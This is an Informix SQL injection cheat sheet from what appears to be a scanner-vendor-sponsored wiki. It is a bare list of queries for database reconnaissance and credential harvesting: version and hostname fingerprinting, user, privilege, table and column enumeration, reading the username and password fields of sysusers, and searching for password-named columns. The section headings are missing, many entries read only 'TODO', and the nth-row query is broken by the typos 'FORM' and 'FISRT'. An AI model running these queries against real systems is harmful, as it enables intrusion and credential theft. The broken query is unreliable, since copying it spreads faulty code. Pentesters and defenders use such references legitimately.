The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

Informix SQL Injection Cheat Sheet

 

 

Back to top

  • SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
  • SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
  • SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
  • SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix

Back to top

  • SELECT 1 FROM systables WHERE tabid = 1; -- comment

Back to top

  • SELECT USER FROM systables WHERE tabid = 1;
  • SELECT CURRENT_ROLE FROM systables WHERE tabid = 1;

Back to top

  • SELECT username, usertype, password FROM sysusers;

Back to top

TODO

Back to top

  • SELECT tabname, grantor, grantee, tabauth FROM systabauth JOIN systables ON systables.tabid = systabauth.tabid; -- which tables are accessible by which users
  • SELECT procname, owner, grantor, grantee FROM sysprocauth JOIN sysprocedures ON sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users

Back to top

TODO

Back to top

  • SELECT DBSERVERNAME FROM systables WHERE tabid = 1; -- server name

Back to top

  • SELECT name, owner FROM sysdatabases;

Back to top

  • SELECT tabname, colname, owner, coltype FROM syscolumns JOIN systables ON syscolumns.tabid = systables.tabid;

Back to top

  • SELECT tabname, owner FROM systables;
  • SELECT tabname, viewtext FROM sysviews  JOIN systables ON systables.tabid = sysviews.tabid;

Back to top

  • SELECT procname, owner FROM sysprocedures;

Back to top

  • SELECT tabname, colname, owner, coltype FROM syscolumns JOIN systables ON syscolumns.tabid = systables.tabid WHERE colname LIKE '%pass%';

Back to top

  • SELECT FIRST 1 tabid FORM (SELECT FISRT 10 tabid FROM systables ORDER BY tabid) as sq ORDER BY tabid DESC; -- selects the 10th row

Back to top

  • SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables WHERE tabid = 1; -- returns 'C'

Back to top

  • SELECT bitand(6, 1) FROM systables WHERE tabid = 1; -- returns 0
  • SELECT bitand(6, 2) FROM systables WHERE tabid = 1; -- returns 2

Back to top

TODO

Back to top

  • SELECT ASCII('A') from systables WHERE tabid = 1;

Back to top

  • SELECT CAST('123' as integer) FROM systables WHERE tabid = 1;
  • SELECT CAST(1 as char) FROM systables WHERE tabid = 1;

Back to top

  • SELECT 'A' || 'B' FROM systables WHERE tabid = 1; -- returns 'AB'
  • SELECT CONCAT('A', 'B') FROM systables WHERE tabid = 1; — returns 'AB'

Back to top

  • SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) FROM systables;

Back to top

TODO

Back to top

  • SELECT tabid, CASE WHEN tabid>10 THEN 'High' ELSE 'Low' END FROM systables;

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

  • SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname

Back to top

TODO

Back to top

These are the system databases:

  • sysmaster
  • sysadmin
  • sysuser
  • sysutils

Back to top